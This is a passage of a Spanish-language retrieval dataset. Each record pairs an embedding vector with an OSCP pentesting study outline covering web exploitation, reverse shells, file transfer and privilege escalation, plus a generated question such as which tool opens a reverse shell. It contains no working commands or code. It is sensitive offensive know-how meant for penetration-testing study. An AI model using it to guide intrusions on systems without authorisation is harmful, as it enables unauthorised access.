-0.01478, -0.14383, -0.1128, 0.00194, -0.28808, -0.15626, -0.12703, 0.08291, 0.06911, -0.17366, -0.01675, 0.11147, -0.17341, 0.0006, 0.10626, 0.0373, -0.13505, -0.05932, 0.06075, 0.07395, 0.01214, -0.03442, -0.06631, -0.16638, 0.01766, 0.07361, 0.08549, -0.13773, 0.00053, -0.10094, 0.00961, 0.01025, 0.02874, -0.01556, -0.00839, -0.06279, 0.10818, -0.00277, -0.02792, -0.05419, -0.01977, -0.19281, -0.00175, 0.09387, 0.01412, 0.11211, 0.01509, -0.03582, 0.0557, -0.07378, -0.0829, -0.07412, -0.11651, -0.06321, -0.06481, 0.05636, -0.06954, -0.00177, 0.01106, -0.14156, -0.04748, -0.01453, 0.0337, -0.02916, 0.04091, 0.00086, -0.10941, 0.02136, 0.15518, -0.09053, -0.05497, -0.01766, -0.10519, 0.0001, -0.05876, 0.08182, 0.08417, 0.0258, -0.05294, -0.11047, 0.02322, -0.09583, 0.0453, 0.10622, 0.03291, 0.12876, 0.02723, 0.03346, -0.09921, 0.05628, -0.01452, 0.00126, 0.01957, 0.01969, 0.04509, 0.03636, -0.0826, -0.03544, 0.05584, 0.05692, -0.0951, 0.00624, 0.10373, -0.00269, 0.05521, 0.02498, -0.03961, -0.03997, -0.01285, 0.05867, 0.05486, -0.04442, -0.04709, 0.04582, 0.06523, 0.00488, 0.03796, -0.10344, 0.02528, 0.00324, 0.02765, -0.03841, 0.03026, -0.04974, -0.08384, -0.05569, -0.03819, -0.02493, -0.0313, 0.01298, -0.02088, -0.04212, -0.02182, -0.00761, 0.00336, 0.05432, -0.16413, -0.09242, -0.06647, 0.00835, -0.00079, -0.04218, -0.03823, -0.00585, 0.00012, 0.05865, -0.01529, 0.02418, -0.04339, 0.04227, -0.05672, 0.05485, 0.02363, -0.01066, -0.08106, 0.04115, -0.02699, -0.10911, 0.04156, 0.03349, 0.005, 0.01445, 0.04846, -0.00067, -0.04395, 0.02763, -0.00923, 0.02535, 0.04381, 0.06751, 0.05085, 0.09991, -0.04103, 0.05573, 0.02003, -0.05429, -0.01488, 0.05701, -0.06318, 0.0477, -0.01516, -0.03991, 0.00372, 0.06555, -0.02378, -0.01416, 0.00831, 0.01992, 0.02458, -0.04637, 0.00294, 0.01613, -0.10959, 0.06712, 0.03583, 0.01387, -0.00827, 0.03361, -0.04001, -0.01428, -0.0578, -0.03842, -0.07048, 0.00113, 0.01514, -0.05835, -0.0064, -0.03266, 0.00237, -0.00092, 0.02813, 0.02165, 0.00763, 0.01944, -0.06154, -0.03075, 0.01549, 0.03853, -0.02783, -0.00595, -0.01597, 0.04621, -0.07236, -0.02093, -0.00908, -0.03293, -0.07457, -0.00927, 0.0354, 0.02889, -0.04173, -0.03394, 0.04558, 0.03195, -0.05369, -0.03184, -0.01547, -0.03022, -0.01364, 0.04566, 0.03387, -0.016, 0.06938, -0.03792, -0.00992, -0.01853, -0.03141, -0.08786, -0.02833, -0.00655, -0.02552, 0.04753, 0.03682, -0.02303, -0.0038]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🌐 ExplotaciΓ³n web\n- Hacking web (Γ­ndice/metodologΓ­a) Β· Burp Suite Β· Burp Repeater e Intruder\n- SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE\n- File upload bypass Β· XSS Β· SSTI Β· Authentication attacks", "indexar": "con quΓ© programa puedo probar vulnerabilidades de subida de archivos", "v": [0.13024, 0.02096, -0.15866, -0.13079, 0.02048, 0.00686, 0.00804, -0.07515, -0.07873, -0.14206, 0.0013, -0.09736, -0.01863, -0.05345, -0.13255, 0.03332, 0.06807, -0.10009, 0.07655, 0.0006, 0.10526, -0.03427, -0.02884, -0.1609, 0.02105, -0.00148, 0.02389, 0.10165, 0.07311, -0.11507, -0.08825, 0.00311, 0.07678, 0.02167, -0.05515, 0.1096, 0.05292, 0.01934, 0.07007, -0.05367, 0.04711, 0.00532, 5e-05, -0.05685, 0.08236, -0.08461, -0.00753, -0.07598, -0.03658, -0.06082, -0.02088, -0.00985, -0.02617, -0.09102, -0.0394, -0.02769, -0.03209, -0.09224, -0.00439, 0.02001, -0.02894, 0.10054, 0.04204, -0.01389, -0.00101, -0.10916, -0.06071, 0.05772, -0.14561, 0.08372, 0.02027, 0.01872, -0.02822, 0.00817, -0.05004, -0.01519, -0.00643, -0.07117, -0.07018, -0.01438, -0.04938, 0.06149, 0.0458, 0.1308, -0.17891, -0.08848, 0.0452, -0.02591, 0.00363, 0.01621, 0.16921, -0.04751, 0.04429, 0.04052, 0.03498, -0.06421, 0.17577, -0.04081, -0.02387, -0.03021, -0.06322, -0.06771, -0.04201, 0.18751, 0.03167, 0.1793, 0.00334, 0.0616, -0.01492, -0.03465, 0.01496, -0.01924, -0.06894, 0.04358, -0.11777, 0.03933, -0.0267, -0.02192, 0.01572, -0.07653, -0.01288, 0.01073, -0.01306, 0.04968, 0.06135, 0.00194, 0.03528, 0.10386, -0.06356, 0.04819, 0.03164, 0.09144, 0.03536, 0.01679, -0.0647, 0.00684, 0.0708, -0.02639, -0.02107, -0.04901, 0.06964, 0.06637, 0.03628, 0.06199, 0.05017, 0.03956, -0.05698, -0.0174, -0.06939, 0.03305, -0.03777, -0.02609, -0.0201, 0.06866, -0.03244, -0.02649, 0.01837, -0.13161, -0.05315, 0.11097, -0.05749, 0.07807, -0.08441, 0.06387, 0.05616, -0.02007, 0.10488, 0.03942, 0.03571, 0.01982, -0.03598, 0.06618, 0.05045, -0.10289, 0.07874, -0.02963, 0.003, -0.08515, 0.0142, -0.07701, -0.07008, 0.02243, 0.09425, 0.01229, -0.03954, -0.02186, 0.02492, 0.02316, 0.08658, 0.02007, -0.09275, -0.02212, -0.074, 0.00083, 0.0012, -0.04425, -0.00826, 0.05197, -0.02489, -0.02011, -0.07093, -0.04319, -0.06849, -0.01508, 0.06789, 0.03885, 0.00382, -0.01091, 0.07626, 0.09483, -0.02121, -0.02105, 0.11832, -0.02578, -0.01331, 0.02315, -0.01757, 0.11205, 0.03371, -0.00211, -0.03638, 0.00881, 0.04534, 0.08871, -0.0224, -0.05527, -0.02411, -0.05877, 0.00683, 0.03323, -0.00634, -0.01508, -0.03575, -0.00893, 0.01914, 0.01398, 0.01642, 0.0257, -0.03867, -0.04417, -0.03482, 0.10267, 0.01234, -0.0918, -0.03811, -0.04196, 0.00455, -0.00657, 0.01591, 0.01226, -0.04067, 0.05471, -0.01568, -0.05463, 0.0203, -0.00238]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🌐 ExplotaciΓ³n web\n- Hacking web (Γ­ndice/metodologΓ­a) Β· Burp Suite Β· Burp Repeater e Intruder\n- SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE\n- File upload bypass Β· XSS Β· SSTI Β· Authentication attacks", "indexar": "cΓ³mo encuentro alternativas libres a Burp Suite", "v": [-0.00751, 0.02744, -0.13132, -0.11407, -0.16878, -0.05245, 0.02057, -0.10313, -0.05224, -0.07512, -0.08271, -0.00273, -0.05029, 0.0492, 0.03361, -0.07108, -0.04023, 0.09284, 0.02957, -0.02589, 0.08044, 0.1406, -0.09075, -0.02103, 0.05155, -0.11489, -0.04475, 0.03246, 0.13166, 0.00585, 0.09847, -0.00983, -0.02639, 0.06356, 0.00458, -0.17972, -0.01819, 0.03381, -0.04893, -0.16739, 0.07412, 0.02605, 0.0127, 0.10461, 0.01526, -0.10561, -0.0983, 0.14824, -0.02779, 0.02819, -0.06491, 0.07266, -0.00487, 0.00681, -0.00135, -0.08379, 0.08087, 0.0265, -0.01943, 0.02266, -0.02054, 0.05599, 0.09919, -0.05211, 0.12141, -0.01651, 0.06688, 0.00911, -0.04997, 0.04682, -0.10806, -0.02158, 0.01132, -0.05533, -0.0594, 0.00686, 0.00274, 0.07904, -0.01453, 0.02501, 0.12969, -0.03395, -0.08294, 0.03958, -0.08933, -0.10264, 0.13637, -0.13675, -0.14792, 0.06008, 0.11086, 0.03443, 0.07376, 0.09175, -0.05592, -0.12505, 0.05423, 0.08912, -0.04161, 0.13396, 0.04219, 0.00729, -0.09014, -0.01829, -0.09436, -0.05068, -0.05819, 0.05186, -0.02347, 0.02477, -0.02263, 0.06522, 0.03883, -0.0321, -0.0598, -0.07108, 0.01232, -0.02011, -0.00977, -0.0143, -0.02047, 0.02417, -0.03175, -0.09375, 0.01079, 0.04013, -0.01563, 0.03337, 0.00155, 0.02067, -0.03721, 0.02237, -0.06365, -0.08014, 0.0166, -0.03631, 0.10614, -0.05447, -0.02287, 0.00621, 0.01912, -0.01013, 0.03084, -0.0904, 0.05255, -0.00113, 0.07079, -0.11592, -0.04141, -0.04526, 0.0186, -0.01805, -0.04402, 0.0654, -0.01341, -0.00641, -0.12272, -0.03547, -0.03243, 0.05204, -0.04709, -0.00586, -0.0794, 0.05441, 0.07297, -0.05509, -0.01447, -0.01727, -0.04365, 0.02092, -0.03273, 0.05824, 0.00937, -0.11767, -0.02251, 0.05926, 0.05233, -0.0628, 0.01797, -0.06828, 0.03278, 0.02533, -0.11906, -0.05354, -0.07502, -0.07473, -0.04357, 0.03412, 0.08788, 0.02759, -0.04098, 0.07699, -0.04148, -0.07179, -0.03698, -0.01246, -0.01979, -0.07833, 0.01247, 0.05471, -0.07834, -0.01565, 0.00661, -0.04883, -0.02717, 0.00497, -0.02984, 0.03274, -0.02869, 0.05647, -0.00434, -0.01727, 0.1436, -0.06478, -0.10223, -0.04923, -0.02262, -0.038, 0.02319, 0.00905, 0.06406, 0.01912, 0.03966, -0.01873, 0.02535, -0.01086, 0.02248, 0.01825, -0.06849, 0.06775, -0.02272, 0.04741, -0.03801, 0.0498, 0.02483, 0.04009, 0.02458, 0.05864, -0.03879, -0.02038, 0.15166, 0.03866, -0.02794, 0.00446, 0.00655, -0.0387, -0.06813, -0.00671, 0.00524, 0.03744, 0.00392, -0.00622, 0.03889, -0.0302, -0.0214, -0.04958]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🐚 Shells y transferencia\n- Puesto de mando Kali Β· Reverse shell Β· Estabilizar shell TTY\n- Egress filtering Β· Transferencia de ficheros", "indexar": "quΓ© programa sirve para establecer un shell inverso desde otro sistema?", "v": [0.04, 0.08769, -0.14034, -0.01169, 0.07668, -0.13848, -0.04488, -0.20361, -0.09695, -0.0331, -0.14599, -0.00144, -0.02777, -0.11282, 0.1361, 0.0365, 0.00891, -0.14165, 0.02511, -0.01268, -0.07837, -0.07331, 0.05968, -0.09168, -0.09804, 0.0808, -0.06697, -0.05756, -0.083, -0.018, -0.01115, -0.05262, 0.07377, -0.13963, -0.05516, 0.02745, 0.02663, -0.00555, -0.01042, 0.05027, 0.08582, 0.00837, -0.00372, 0.12762, 0.05391, -0.03291, 0.03525, -0.00131, 0.01477, -0.03881, -0.0574, -0.01193, -0.0978, -0.05047, 0.1287, -0.14179, 0.04192, -0.10002, 0.00832, -0.08578, -0.08022, 0.03894, -0.02424, -0.0134, 0.12865, -0.02531, -0.04033, -0.07955, -0.06119, -0.01499, -0.04025, -0.00305, 0.08031, 0.00085, -0.00164, 0.05556, 0.06154, 0.0068, 0.05453, -0.09794, -0.12533, -0.06228, -0.05608, 0.07723, 0.01392, -0.01762, 0.05471, -0.00727, -0.05578, -0.00287, -0.00987, 0.0446, 0.02137, 0.06184, 0.07719, -0.04667, 0.008, 0.02749, 0.01342, 0.07486, 0.05364, -0.09971, -0.06495, 0.14128, -0.0795, 0.04591, 0.05294, 0.00791, -0.02123, 0.0648, -0.00754, -0.0332, 0.04583, -0.02778, -0.01258, -0.05045, -0.01094, 0.00514, 0.04712, 0.01826, -0.11081, 0.06297, -0.03411, 0.04827, 0.05267, -0.03319, -0.02974, 0.11251, 0.04697, 0.10164, 0.02681, -0.00815, -0.02431, 0.04168, -0.0971, -0.00547, 0.08454, 0.02626, -0.0331, -0.03829, 0.07139, 0.11913, 0.02001, -0.0444, 0.00334, -0.00992, 0.15086, -0.11663, -0.04954, -0.0036, -0.06765, 0.07447, -0.02574, 0.02149, -0.06551, -0.05638, 0.01804, -0.10352, -0.06993, 0.02816, -0.04466, -0.01167, 0.03049, -0.01798, 0.05564, -0.0705, -0.08642, -0.04921, 0.12038, 0.05912, -0.02774, 0.06676, 0.06463, -0.02715, 0.0195, 0.01156, -0.03051, -0.0506, 0.05977, -0.02565, -0.08512, 0.04975, 0.02716, -0.03337, -0.01439, 0.04645, -0.03172, 0.06416, 0.02483, -0.00191, 0.06689, 0.04306, -0.021, -0.02957, -0.0523, 0.06232, -0.01329, -0.09165, 0.10517, 0.04178, -0.05453, 0.05997, 0.04022, -0.04002, 0.00761, 0.11017, -0.0304, 0.00185, 0.05894, 0.14162, 0.0056, 0.01985, 0.06287, 0.10364, -0.03778, 0.03294, 0.00057, 0.07296, 0.02316, 0.05497, -0.00033, -0.00333, -0.00639, 0.0571, -0.03437, -0.0753, 0.02372, 0.04188, 0.03123, 0.0042, -0.04799, -0.04427, 0.01605, -0.02702, -0.00823, -0.0005, -0.01515, -0.05857, 0.0007, -0.0903, 0.04815, 0.14313, 0.00883, -0.11048, 0.00412, -0.02604, -0.04642, -0.01069, 0.01664, -0.03006, -0.08305, 0.07048, 0.03049, -0.0422, 0.00904, -0.0329]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🐚 Shells y transferencia\n- Puesto de mando Kali Β· Reverse shell Β· Estabilizar shell TTY\n- Egress filtering Β· Transferencia de ficheros", "indexar": "con quΓ© herramienta puedo transferir archivos a travΓ©s del shell?", "v": [0.08069, 0.0503, -0.09007, -0.13073, 0.06753, -0.09848, -0.02408, -0.04822, -0.0088, -0.03269, -0.14692, 0.04663, 0.04358, -0.0986, 0.04738, 0.08155, 0.07657, -0.10829, 0.04238, -0.03885, 0.02319, 0.01248, -0.11314, -0.13548, -0.15694, -0.02072, 0.00711, 0.0939, -0.20509, 0.01528, -0.03714, -0.06604, 0.14809, -0.02806, 0.00696, -0.00878, -0.0024, 0.15855, -0.0285, 0.02606, -0.00358, 0.06498, -0.06334, 0.16555, 0.04233, -0.09586, -0.0496, -0.05691, 0.02652, 0.01393, -0.00375, -0.17066, -0.19766, 0.03535, -0.00281, -0.0985, 0.19036, -0.15009, 0.09481, -0.03304, -0.09563, 0.06334, -0.04664, 0.05465, 0.00244, -0.03417, -0.08002, -0.0558, -0.20866, 0.12552, 0.04169, 0.07455, 0.03653, 0.06218, -0.13315, 0.00683, 0.00384, -0.00041, -0.01961, -0.06697, 0.07763, -0.06674, 0.0218, -0.01595, -0.01331, -0.064, 0.03382, -0.0333, 0.04621, -0.06226, -0.00451, -0.05175, 0.0551, 0.01458, 0.03127, -0.0218, -0.03842, -0.04952, -0.06001, -0.08413, 0.05001, 0.01654, -0.05704, 0.14406, 0.00491, 0.047, -0.01868, -0.028, 0.00111, -0.01119, 0.11933, 0.01573, 0.05844, 0.06623, -0.00316, 0.10654, -0.05916, -0.07962, -0.0222, -0.05722, 0.01935, 0.05676, -0.03284, -0.00113, -0.00015, -0.04444, -0.07595, 0.12041, -0.0657, -0.00091, 0.00885, 0.02462, -0.09487, 0.01516, -0.05599, -0.02283, 0.05117, -0.05833, 0.03015, -0.07586, 0.0041, 0.00047, -0.00858, -0.03459, 0.04891, 0.02986, -0.00996, -0.03706, -0.08059, -0.09514, 0.02672, -0.03088, 0.00155, 0.02963, -0.06189, 0.02401, 0.01183, -0.03473, -0.11872, 0.01115, -0.07565, 0.01381, -0.01176, 0.00912, -0.04677, -0.09398, 0.05032, 0.04152, 0.02597, 0.02456, 0.03261, 0.02309, 0.04263, -0.01335, 0.00022, -0.01452, -0.06824, -0.04959, 0.04508, -0.0977, -0.00933, 0.02609, -0.03757, -0.01956, 0.02712, -0.04086, 0.02485, 0.02728, -0.03906, 0.0992, -0.02984, 0.03974, 0.01982, -0.01497, -0.01593, 0.00905, -0.05342, -0.06191, 0.04534, 0.01752, -0.02872, 0.0152, -0.00102, -0.07395, 0.04172, 0.08134, -0.07553, -0.01267, -0.01932, 0.02683, 0.01959, -0.02888, 0.10651, -0.02331, 0.02877, 0.02878, -0.04677, -0.0049, 0.0025, 0.0406, 0.06489, 0.01236, 0.05072, -0.00422, -0.00928, 0.05307, -0.00234, -0.00676, -0.01266, 0.00725, 0.00699, 0.0353, 0.0353, -0.02275, 0.05155, -0.02215, 0.0035, -0.05608, -0.06575, -0.00231, -0.03371, 0.07112, -0.01808, -0.01428, -0.03432, 0.00824, -0.06969, -0.0176, -0.01766, -0.09365, -0.02438, 0.04639, 0.0411, -0.028, 0.03603, -0.03212]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🐚 Shells y transferencia\n- Puesto de mando Kali Β· Reverse shell Β· Estabilizar shell TTY\n- Egress filtering Β· Transferencia de ficheros", "indexar": "quΓ© programa me ayuda a estabilizar una conexiΓ³n de shell en modo TTY?", "v": [-0.15697, 0.07868, -0.21975, -0.0901, 0.08889, -0.01849, -0.15962, -0.08492, 0.08067, 0.14506, -0.19744, 0.05755, 0.05076, 0.01217, 0.01473, 0.00213, 0.02013, -0.13102, 0.07727, 0.02135, 0.05448, -0.05186, -0.09447, -0.0667, -0.00083, 0.02779, 0.04242, -0.03907, -0.12094, -0.05413, 0.00915, -0.16177, 0.01432, -0.02583, -0.04965, 0.06641, 0.11221, 0.04789, -0.00352, 0.09626, -0.10418, -0.16289, 0.15514, 0.02412, 0.17662, 0.07978, 0.01907, -0.06338, 0.05513, 0.03694, -0.08957, -0.01979, -0.032, -0.01116, 0.04185, -0.06109, 0.07415, -0.15566, 0.01161, 0.00955, -0.17349, -0.05832, -0.02315, 0.0312, 0.06379, 0.05052, 0.00814, -0.04549, -0.1385, 0.08434, -0.01037, -0.01035, -0.00568, -0.10224, -0.00617, 0.08065, 0.04317, -0.08034, 0.05881, -0.01772, -0.02265, 0.02776, 0.05059, 0.10297, -0.0608, -0.03678, -0.0265, -0.06127, -0.07088, -0.00617, 0.08472, -0.04079, -0.02782, 0.06238, -0.02298, -0.08904, 0.02444, -0.06967, 0.02242, 0.01663, 0.03595, -0.07811, -0.0845, 0.09531, -0.04564, -0.03565, 0.09333, 0.00642, -0.0957, 0.15755, 0.06321, 0.02729, 0.04207, -0.03867, -0.0545, 0.01806, 0.01759, -0.038, 0.02076, -0.14104, -0.04681, 0.02196, -0.03559, 0.05325, 0.00734, 0.04816, 0.01356, 0.12483, -0.0336, 0.04923, -0.0309, 0.05214, -0.02597, -0.07951, 0.01753, -0.00828, 0.00728, -0.09432, 0.00956, -0.07725, 0.00603, 0.04186, 0.01589, 0.04763, 0.05652, 0.01874, 0.05494, -0.01317, -0.03368, 0.06023, 0.04109, 0.09718, -0.00178, -0.02317, -0.02133, -0.04067, 0.02283, 0.03464, 0.02353, -0.00606, 0.01021, 0.01708, -0.01347, -0.07044, 0.01998, -0.0868, -0.01598, 0.05892, 0.01716, 0.02255, -0.00662, 0.03711, 0.02448, -0.00757, -0.0217, -0.06811, -0.05406, -0.05368, -0.03213, -0.00938, -0.03491, 0.00066, 0.07383, -0.02587, 0.00836, -0.00574, -0.0193, 0.02786, -0.01004, 0.03654, 0.00705, 0.00025, -0.04371, -0.01867, 0.00078, -0.05548, 0.00169, -0.07203, 0.05244, -0.02056, -0.03805, -0.04626, 0.06354, -0.05748, 0.04402, 0.06538, -0.06651, 0.0338, 0.08018, 0.07051, 0.01549, 0.02607, 0.0629, 0.07286, -0.0107, 0.04666, -0.00642, 0.03908, -0.00355, 0.00233, -0.00332, -0.02322, 0.06001, 0.08847, -0.00304, -0.0591, 0.04107, 0.04562, -0.02885, 0.02107, -0.03823, -0.09941, 0.02457, -0.0585, -0.02455, -0.01194, -0.03885, -0.04999, 0.01072, -0.01321, 0.02202, 0.07352, 0.00432, -0.04858, 0.03301, -0.01974, -0.04664, 0.0233, -0.00192, 0.01742, -0.05204, 0.0606, 0.04215, -0.0661, 0.06959, 0.03935]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⬆️ Escalada de privilegios\n- Privesc Linux Β· Privesc Windows Β· PEASS-ng\n- Potato attacks Β· GTFOBins y LOLBAS", "indexar": "ΒΏQuΓ© herramientas puedo usar para subir mis propios privilegios en un sistema?", "v": [-0.07882, 0.1237, -0.15244, -0.11595, 0.01429, -0.10245, -0.0521, -0.18579, -0.13041, -0.13684, -0.17458, -0.00995, -0.05118, -0.02489, -0.03055, -0.08905, 0.00592, -0.08418, -0.00654, 0.01185, 0.04899, -0.04867, -0.09204, -0.12931, -0.08857, -0.00065, 0.15628, -0.05769, -0.22696, 0.05442, 9e-05, 0.12065, 0.06564, -0.07559, -0.05536, -0.04854, 0.02011, 0.12059, 0.0708, -0.01399, 0.09533, -0.00063, -0.0357, 0.01995, 0.07861, -0.09567, -0.06666, -0.00637, -0.05343, 0.01107, 0.01119, -0.1, -0.06404, -0.10872, 0.03556, -0.11936, 0.10397, -0.06126, -0.00547, -0.02911, -0.06294, 0.01183, -0.02508, 0.02124, -0.03284, -0.1361, -0.09382, -0.0675, -0.1133, 0.11397, -0.02289, -0.05128, 0.07664, 0.0486, 0.01492, 0.06359, -0.01287, -0.05707, 0.04826, -0.04262, -0.01237, 0.06192, -0.08946, 0.06429, -0.05614, -0.0771, 0.04618, 0.00015, 0.01448, -0.01823, 0.05268, 0.00835, 0.06429, -0.05003, 0.08359, -0.02417, -0.02782, 0.03263, -0.01621, -0.02475, 0.12531, -0.10023, 0.03921, 0.16111, -0.02533, -0.01425, 0.04637, -0.10616, 0.0111, -0.07377, -0.04605, 0.04705, -0.03701, 0.01165, -0.05379, 0.07827, -0.01829, -0.0584, -0.072, -0.07489, 0.0369, -0.00814, 0.04751, -0.1032, 0.13346, -0.05455, 0.01103, 0.10643, -0.01545, 0.01797, 0.01964, -0.02715, -0.00687, -0.06118, 0.03131, -0.06228, 0.03796, -0.01994, -0.03523, -0.08281, 0.02411, 0.04421, -0.13491, -0.14398, 0.06746, 0.00979, -0.0038, -0.073, -0.054, -0.11182, -0.03426, -0.05077, 0.01197, -0.01423, -0.00662, -0.05869, 0.04647, -0.06896, -0.06999, -0.01076, -0.01871, -0.06285, 0.0242, 0.00863, 0.01099, 0.00759, 0.04307, -0.0598, -0.00113, 0.00051, 0.05785, 0.03965, 0.06259, -0.03852, 0.05013, -0.04882, -0.05748, -0.01577, 0.00595, 0.03915, -0.02329, 0.04579, 0.01469, 0.01521, 0.00184, -0.01567, 0.02711, -0.02013, 0.0288, 0.09211, -0.035, 0.01888, 0.02451, -0.04398, 0.02194, 0.00085, -0.01758, -0.01283, -0.03597, 0.01731, 0.00255, 0.017, 0.00762, -0.05681, 0.00911, -0.0275, 0.03135, -0.03892, 0.0503, 0.08948, -0.01368, 0.02193, 0.10564, -0.02953, -0.01963, 0.03409, -0.01729, 0.04313, -0.04828, -0.09387, 0.02849, 0.03245, 0.06246, 0.04395, 0.06522, 0.02023, -0.04377, 0.00983, -0.02052, -0.00569, 0.01534, -0.04765, 0.04877, -0.01494, -0.02455, -0.0691, 0.03357, 0.00461, -0.01174, 0.00142, 0.00577, 0.08187, 0.07518, -0.01646, -0.06903, -0.01096, -0.04769, -0.05406, -0.04636, -0.04804, 0.03386, -0.04093, 0.01906, -0.0451, -0.02344, 0.03054]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⬆️ Escalada de privilegios\n- Privesc Linux Β· Privesc Windows Β· PEASS-ng\n- Potato attacks Β· GTFOBins y LOLBAS", "indexar": "Con quΓ© programa puedo realizar ataques de escalada de privilegios especΓ­ficos en Linux o Windows?", "v": [0.02566, 0.13384, -0.16631, -0.13208, 0.0102, -0.10129, -0.00805, -0.03395, -0.1011, -0.03203, 0.10467, -0.07952, -0.0623, -0.08974, 0.036, -0.0574, -0.00184, -0.07483, 0.06345, -0.02595, -0.04704, -0.02983, -0.06206, 0.00866, 0.05942, -0.03603, 0.0333, -0.00026, 0.02281, -0.01533, -0.04263, 0.08827, -0.04602, -0.00094, 0.05924, 0.07916, 0.01086, 0.08244, 0.12549, -0.00576, 0.02131, 0.02764, -0.06801, -0.06367, 0.08516, -0.16199, 0.05287, 0.02204, 0.06582, -0.15954, 0.09823, 0.01352, -0.05056, -0.16945, 0.09865, -0.04202, 0.07676, -0.0484, 0.04053, 0.0618, -0.10391, 0.08175, 0.01367, -0.03579, 0.05508, -0.03935, 0.00148, -0.04396, -0.05359, 0.08381, -0.08239, 0.0091, 0.05301, 0.02767, 0.05494, 0.03971, -0.10553, 0.02568, 0.0626, -0.0534, 0.02945, 0.0506, 0.00106, 0.06211, -0.13234, -0.17495, -0.03414, -0.00761, -0.02697, 0.015, 0.12792, -0.01602, -0.03363, 0.0255, 0.05758, -0.03663, 0.08774, 0.05208, 0.03799, 0.06119, -0.07518, -0.05975, -0.09032, 0.20234, 0.02023, 0.10864, 3e-05, -0.0969, -0.05851, -0.08735, 0.01257, -0.01568, -0.03384, -0.03583, -0.11857, -0.04651, -0.06177, -0.06082, 0.05016, -0.04093, -0.13489, -0.00354, -0.01746, 0.05856, 0.03377, -0.04962, -0.08987, 0.16548, -0.11955, -0.02468, 0.03453, -0.01644, 0.05264, 0.03415, -0.08129, 0.03617, 0.0265, -0.10383, 0.04649, -0.06019, 0.11939, 0.08544, 0.03605, 0.009, 0.10133, 0.02156, -0.00597, -0.06298, -0.05859, -0.06243, 0.00956, -0.00293, 0.00934, 0.05725, -0.08567, -0.07298, -0.0031, 0.01718, -0.03225, 0.09325, -0.01886, -0.00165, -0.0699, -0.00922, 0.0362, -2e-05, -0.01051, 0.05164, 0.01909, 0.02797, -0.02302, 0.09797, -0.00383, -0.05571, 0.01125, -0.0509, 0.01286, -0.07299, 0.03255, 0.00729, -0.13004, 0.04887, 0.08162, -0.03461, -0.02661, -0.02481, -0.02403, 0.04142, 0.03039, 0.05358, -0.04973, 0.00367, 0.02645, -0.0194, -0.01239, -0.05206, -0.05907, 0.01502, -0.01379, 0.01175, -0.05584, -0.01101, -0.02618, -0.05134, 0.07714, 0.04395, -0.04053, -0.03095, 0.04242, 0.11007, 0.04779, -0.00322, 0.05256, -0.01584, -0.0154, -0.04142, 0.09013, 0.07009, 0.01295, -0.00794, 0.00307, 0.0143, 0.08863, 0.02691, -0.00092, -0.10683, -0.04387, -0.03255, 0.0207, 0.04333, 0.01872, -0.04253, 0.00363, -0.0308, 0.03509, 0.02132, 0.04044, 0.00805, -0.02264, -0.00662, -0.0723, 0.08974, 0.01462, -0.09065, -0.0766, -0.04116, -0.06166, 0.01963, -0.00541, -0.04782, 0.01295, -0.0131, -0.01237, -0.0453, -0.01378, 0.05817]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⬆️ Escalada de privilegios\n- Privesc Linux Β· Privesc Windows Β· PEASS-ng\n- Potato attacks Β· GTFOBins y LOLBAS", "indexar": "ΒΏExiste alguna alternativa libre a los frameworks de escalada como Privesc o PEASS-ng?", "v": [-0.02058, -0.06013, -0.14336, -0.02864, -0.01084, 0.02066, 0.06046, -0.22636, -0.10813, -0.10869, 0.01861, 0.06487, -0.1458, -0.02832, 0.26713, -0.09005, 0.03775, 0.02012, 0.12163, 0.08386, -0.06007, -0.01086, -0.16648, -0.03347, 0.06413, 0.0151, -0.03774, 0.10075, -0.09313, -0.12708, 0.01041, 0.13598, -0.08898, -0.07347, 0.05806, 0.00094, 0.17835, 0.0027, 0.06776, -0.04936, 0.00592, 0.04034, -0.04332, -0.06348, 0.03359, -0.02736, -0.1235, 0.14387, -0.0056, 0.064, -0.10334, 0.00376, -0.04808, -0.04781, 0.0594, 0.02774, 0.16601, -0.07213, -0.01904, -0.03812, -0.12434, 0.04301, 0.07319, -0.12045, 0.02294, -0.09326, 0.01195, 0.02979, -0.08393, 0.02433, 0.02544, -0.07077, 0.01322, 0.02095, -0.05015, 0.005, -0.04504, -0.00586, -0.0385, 0.12902, 0.03527, -0.01927, 0.0368, 0.09506, -0.10311, -0.03817, -0.02512, -0.09848, 0.00225, 0.07107, 0.04626, -0.02775, -0.04872, 0.05864, 0.00243, -0.11542, -0.08521, 0.10074, 0.05719, 0.05645, -0.02375, 0.00844, -0.04199, 0.00464, 0.0255, 0.00628, 0.00635, 0.01373, -0.04238, 0.00268, 0.05928, 0.09045, -0.07968, -0.00631, -0.05057, -0.07304, -0.0506, -0.02049, -0.01433, -0.06472, -0.01546, -0.07515, 0.04507, -0.01964, 0.03513, -0.00111, 0.00058, 0.14853, -0.01179, 0.01003, 0.02335, -0.04088, 0.01074, -0.04278, -0.07128, -0.00444, 0.09824, -0.00751, 0.10077, -0.01167, 0.05164, -0.02156, -0.00982, 0.00278, 0.04363, -0.07275, -0.02486, -0.07772, 0.04005, -0.01065, -0.06543, 0.02107, 0.01565, 0.1658, -0.00505, 0.00865, 0.03247, -0.01791, -0.03515, 0.14384, 0.03069, 